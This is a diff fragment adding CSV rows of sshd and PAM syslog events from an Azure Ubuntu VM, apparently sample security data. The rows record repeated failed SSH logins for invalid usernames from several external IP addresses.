+16306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:41,UbuntuDevEnv,2019-06-26 07:02:40,auth,UbuntuDevEnv,info,Failed password for invalid user ireneusz from 138.68.29.52 port 47032 ssh2,37661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ireneusz,138.68.29.5,47032,,
+16307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:41,UbuntuDevEnv,2019-06-26 07:02:40,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 47032:11: Bye Bye [preauth],37661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,47032,,
+16308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:41,UbuntuDevEnv,2019-06-26 07:02:40,auth,UbuntuDevEnv,info,Disconnected from invalid user ireneusz 138.68.29.52 port 47032 [preauth],37661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ireneusz,138.68.29.5,47032,,
+16309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:57,UbuntuDevEnv,2019-06-26 07:02:57,auth,UbuntuDevEnv,info,Invalid user ba from 64.202.187.152 port 53426,37732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ba,64.202.187.1,53426,,
+16310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:57,UbuntuDevEnv,2019-06-26 07:02:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,37732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:57,UbuntuDevEnv,2019-06-26 07:02:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:03:00,UbuntuDevEnv,2019-06-26 07:02:59,auth,UbuntuDevEnv,info,Failed password for invalid user ba from 64.202.187.152 port 53426 ssh2,37732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ba,64.202.187.1,53426,,
+16313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:03:00,UbuntuDevEnv,2019-06-26 07:03:00,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 53426:11: Bye Bye [preauth],37732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,53426,,
+16314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:03:00,UbuntuDevEnv,2019-06-26 07:03:00,auth,UbuntuDevEnv,info,Disconnected from invalid user ba 64.202.187.152 port 53426 [preauth],37732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ba,64.202.187.1,53426,,
+16315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:03:39,UbuntuDevEnv,2019-06-26 07:03:38,auth,UbuntuDevEnv,info,Invalid user pil from 87.101.240.10 port 56904,37875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pil,87.101.240.1,56904,,
+16316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:03:39,UbuntuDevEnv,2019-06-26 07:03:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,37875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:03:39,UbuntuDevEnv,2019-06-26 07:03:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:03:40,UbuntuDevEnv,2019-06-26 07:03:40,auth,UbuntuDevEnv,info,Failed password for invalid user pil from 87.101.240.10 port 56904 ssh2,37875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pil,87.101.240.1,56904,,
+16319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:03:41,UbuntuDevEnv,2019-06-26 07:03:40,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 56904:11: Bye Bye [preauth],37875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,56904,,
+16320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:03:41,UbuntuDevEnv,2019-06-26 07:03:40,auth,UbuntuDevEnv,info,Disconnected from invalid user pil 87.101.240.10 port 56904 [preauth],37875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pil,87.101.240.1,56904,,
+16321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:01,UbuntuDevEnv,2019-06-26 07:04:00,auth,UbuntuDevEnv,info,Invalid user elaine from 46.101.149.230 port 49436,37960,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elaine,46.101.149.2,49436,,
+16322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:01,UbuntuDevEnv,2019-06-26 07:04:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,37960,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:01,UbuntuDevEnv,2019-06-26 07:04:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37960,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:03,UbuntuDevEnv,2019-06-26 07:04:02,auth,UbuntuDevEnv,info,Failed password for invalid user elaine from 46.101.149.230 port 49436 ssh2,37960,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elaine,46.101.149.2,49436,,
+16325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:03,UbuntuDevEnv,2019-06-26 07:04:02,auth,UbuntuDevEnv,info,Disconnected from invalid user elaine 46.101.149.230 port 49436 [preauth],37960,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elaine,46.101.149.2,49436,,
+16326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:03,UbuntuDevEnv,2019-06-26 07:04:02,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 49436:11: Bye Bye [preauth],37960,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,49436,,
+16327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:14,UbuntuDevEnv,2019-06-26 07:04:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:14,UbuntuDevEnv,2019-06-26 07:04:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,38007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:14,UbuntuDevEnv,2019-06-26 07:04:13,auth,UbuntuDevEnv,info,Invalid user user from 138.68.29.52 port 36122,38007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,138.68.29.5,36122,,
+16330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:15,UbuntuDevEnv,2019-06-26 07:04:15,auth,UbuntuDevEnv,info,Failed password for invalid user user from 138.68.29.52 port 36122 ssh2,38007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,138.68.29.5,36122,,
+16331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:16,UbuntuDevEnv,2019-06-26 07:04:15,auth,UbuntuDevEnv,info,Disconnected from invalid user user 138.68.29.52 port 36122 [preauth],38007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,138.68.29.5,36122,,
+16332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:16,UbuntuDevEnv,2019-06-26 07:04:15,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 36122:11: Bye Bye [preauth],38007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,36122,,
+16333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:16,UbuntuDevEnv,2019-06-26 07:04:15,auth,UbuntuDevEnv,info,Invalid user xoptimo from 206.189.118.156 port 53890,38017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xoptimo,206.189.118.1,53890,,
+16334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:16,UbuntuDevEnv,2019-06-26 07:04:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,38017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:16,UbuntuDevEnv,2019-06-26 07:04:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:17,UbuntuDevEnv,2019-06-26 07:04:17,auth,UbuntuDevEnv,info,Failed password for invalid user xoptimo from 206.189.118.156 port 53890 ssh2,38017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xoptimo,206.189.118.1,53890,,
+16337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:17,UbuntuDevEnv,2019-06-26 07:04:17,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 53890:11: Bye Bye [preauth],38017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,53890,,
+16338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:17,UbuntuDevEnv,2019-06-26 07:04:17,auth,UbuntuDevEnv,info,Disconnected from invalid user xoptimo 206.189.118.156 port 53890 [preauth],38017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xoptimo,206.189.118.1,53890,,
+16339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:28,UbuntuDevEnv,2019-06-26 07:04:28,auth,UbuntuDevEnv,info,Invalid user jenkins from 64.202.187.152 port 42628,38067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,64.202.187.1,42628,,
+16340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:28,UbuntuDevEnv,2019-06-26 07:04:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:28,UbuntuDevEnv,2019-06-26 07:04:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,38067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:31,UbuntuDevEnv,2019-06-26 07:04:31,auth,UbuntuDevEnv,info,Failed password for invalid user jenkins from 64.202.187.152 port 42628 ssh2,38067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,64.202.187.1,42628,,
+16343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:31,UbuntuDevEnv,2019-06-26 07:04:31,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 42628:11: Bye Bye [preauth],38067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,42628,,
+16344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:04:31,UbuntuDevEnv,2019-06-26 07:04:31,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 64.202.187.152 port 42628 [preauth],38067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,64.202.187.1,42628,,
+16345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:43,UbuntuDevEnv,2019-06-26 07:05:42,auth,UbuntuDevEnv,info,Invalid user werkstatt from 87.101.240.10 port 45928,38316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,werkstatt,87.101.240.1,45928,,
+16346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:43,UbuntuDevEnv,2019-06-26 07:05:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,38316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:43,UbuntuDevEnv,2019-06-26 07:05:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:44,UbuntuDevEnv,2019-06-26 07:05:43,auth,UbuntuDevEnv,info,Failed password for invalid user werkstatt from 87.101.240.10 port 45928 ssh2,38316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,werkstatt,87.101.240.1,45928,,
+16349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:44,UbuntuDevEnv,2019-06-26 07:05:44,auth,UbuntuDevEnv,info,Disconnected from invalid user werkstatt 87.101.240.10 port 45928 [preauth],38316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,werkstatt,87.101.240.1,45928,,
+16350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:44,UbuntuDevEnv,2019-06-26 07:05:44,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 45928:11: Bye Bye [preauth],38316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,45928,,
+16351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:45,UbuntuDevEnv,2019-06-26 07:05:44,auth,UbuntuDevEnv,info,Invalid user yu from 138.68.29.52 port 53438,38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yu,138.68.29.5,53438,,
+16352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:45,UbuntuDevEnv,2019-06-26 07:05:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:45,UbuntuDevEnv,2019-06-26 07:05:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:46,UbuntuDevEnv,2019-06-26 07:05:46,auth,UbuntuDevEnv,info,Failed password for invalid user yu from 138.68.29.52 port 53438 ssh2,38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yu,138.68.29.5,53438,,
+16355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:47,UbuntuDevEnv,2019-06-26 07:05:46,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 53438:11: Bye Bye [preauth],38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,53438,,
+16356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:47,UbuntuDevEnv,2019-06-26 07:05:46,auth,UbuntuDevEnv,info,Disconnected from invalid user yu 138.68.29.52 port 53438 [preauth],38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yu,138.68.29.5,53438,,
+16357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:53,UbuntuDevEnv,2019-06-26 07:05:52,auth,UbuntuDevEnv,info,Invalid user intro1 from 206.189.118.156 port 43108,38356,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,intro1,206.189.118.1,43108,,
+16358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:53,UbuntuDevEnv,2019-06-26 07:05:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38356,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:53,UbuntuDevEnv,2019-06-26 07:05:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,38356,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:55,UbuntuDevEnv,2019-06-26 07:05:54,auth,UbuntuDevEnv,info,Failed password for invalid user intro1 from 206.189.118.156 port 43108 ssh2,38356,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,intro1,206.189.118.1,43108,,
+16361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:55,UbuntuDevEnv,2019-06-26 07:05:54,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 43108:11: Bye Bye [preauth],38356,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,43108,,
+16362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:55,UbuntuDevEnv,2019-06-26 07:05:54,auth,UbuntuDevEnv,info,Disconnected from invalid user intro1 206.189.118.156 port 43108 [preauth],38356,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,intro1,206.189.118.1,43108,,
+16363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:56,UbuntuDevEnv,2019-06-26 07:05:55,auth,UbuntuDevEnv,info,Invalid user werkstatt from 64.202.187.152 port 60064,38370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,werkstatt,64.202.187.1,60064,,
+16364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:56,UbuntuDevEnv,2019-06-26 07:05:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:56,UbuntuDevEnv,2019-06-26 07:05:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,38370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
